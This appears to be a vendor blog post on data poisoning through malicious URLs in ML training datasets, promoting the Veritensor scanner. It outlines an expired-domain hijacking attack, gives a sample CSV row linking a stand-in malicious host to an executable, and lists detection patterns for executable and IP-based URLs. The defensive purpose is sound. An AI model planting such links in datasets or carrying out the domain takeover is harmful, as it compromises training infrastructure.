Skip to main content

Data Poisoning via Malicious URLs: The Danger in Your CSV

The "Passive" Threat

When we talk about Data Poisoning, we usually mean injecting bad data to ruin a model's accuracy. But there is a more immediate threat: Infrastructure Compromise.

Modern datasets (CommonCrawl, LAION, or custom scrapes) contain millions of URLs. Data loaders (like webdataset or custom scripts) iterate through these rows and download the content using curl, wget, or Python's requests.

The Attack Vector

An attacker doesn't need to hack the dataset host. They just need to:

  1. Buy an expired domain that is referenced in a popular dataset.
  2. Host a malicious file there (e.g., a script named image.jpg that is actually a shell script, or a direct .exe).
  3. Wait for your training script to download and process it.

If your data processing pipeline has vulnerabilities (like shell=True in subprocess calls or vulnerable image libraries like libwebp), processing that downloaded file triggers an exploit.

In simpler attacks, we've seen CSV files injected with direct links to executables:

id, description, source_url
102, "Cute cat image", "http://malicious-site.com/update.exe"

If a developer blindly clicks links to verify data, or if a script tries to "read" the file type, the machine gets infected.

Scanning Terabytes of Data

You cannot manually check 10 million rows. You need automated scanning.

Veritensor implements a Streaming Engine specifically for this. It reads Parquet, CSV, and JSONL files chunk-by-chunk (without loading the whole file into RAM) and scans text columns for high-risk URL patterns.

It looks for:

  • URLs ending in executable extensions (.exe, .sh, .bat, .ps1).
  • IP-based URLs (often used for C2 servers).
  • Known phishing domains.
# Scan a 50GB Parquet file with low memory usage
veritensor scan ./big_data.parquet --full-scan

Clean data isn't just about model performance; it's about keeping your training cluster safe.